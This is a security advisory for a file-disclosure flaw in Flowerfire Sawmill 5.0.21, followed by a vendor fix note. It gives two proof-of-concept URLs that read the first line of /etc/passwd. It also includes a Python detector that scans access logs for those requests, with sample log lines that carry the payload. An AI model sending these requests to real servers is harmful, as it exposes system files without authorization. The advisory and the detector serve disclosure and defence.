Flowerfire Sawmill File Access Vulnerability
Info
| Bugtraq ID: | 1402 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jun 26 2000 12:00AM |
| Updated: | Jun 26 2000 12:00AM |
| Credit: | Posted to BugTraq on June 26th by Larry Cashdollar ([email protected]). |
| Vulnerable: | Flowerfire Sawmill 5.0.21 |
| Not Vulnerable: | |
Discussion
Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world-readable file whose full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".'
Exploit / POC
The following request will display the first line of /etc/passwd:
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
If Sawmill is run as a CGI script, the following can be used instead:
http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
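A defensive check for the request shape shown above, as an added example that is not part of the original advisory: it scans web server access logs for requests to a Sawmill script whose query string carries `rfcf` followed by a quoted file path, and reports the client and the path requested. The Common Log Format input, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# "rfcf" followed by a double-quoted argument, seen after percent-decoding.
RFCF_RE = re.compile(r'(?:^|\+)rfcf\+"(?P<path>[^"]*)"', re.IGNORECASE)

def find_rfcf_requests(log_lines):
    """Return (client, script, path) for every request to a Sawmill script
    whose query string carries rfcf with a quoted file argument."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        script, query = m.group("target").split("?", 1)
        if "sawmill" not in script.lower():
            continue
        # unquote() leaves '+' alone; map decoded %20 spaces onto '+' as well
        # so both separator spellings reach the same pattern.
        query = unquote(query).replace(" ", "+")
        hit = RFCF_RE.search(query)
        if hit:
            client = line.split(" ", 1)[0]
            hits.append((client, script, hit.group("path")))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2000:10:00:01 +0000] "GET /cgi-bin/sawmill5'
    '?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 512',
    '192.0.2.11 - - [26/Jun/2000:10:00:05 +0000] "GET /sawmill'
    '?rfcf%20%22/etc/passwd%22%20spbn%201,1,21,1,1,1,1,1,1,1,1,1%203 HTTP/1.0" 200 480',
    '198.51.100.7 - - [26/Jun/2000:10:01:00 +0000] "GET /cgi-bin/sawmill5 HTTP/1.0" 200 2048',
    '198.51.100.8 - - [26/Jun/2000:10:02:00 +0000] "GET /search?q=rfcf+%22notes%22 HTTP/1.0" 200 300',
]

if __name__ == "__main__":
    for client, script, path in find_rfcf_requests(SAMPLE_LOG):
        print(f"{client} requested {script} with rfcf path {path!r}")
```

Hits are triage leads: the reported path shows which file a client asked Sawmill to read, which can then be compared against the files the installation is expected to load.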
Solution / Fix
Solution:
Flowerfire has upgraded their product free of charge to address this problem.
Flowerfire Sawmill 5.0.21
Flowerfire: http://www.flowerfire.com/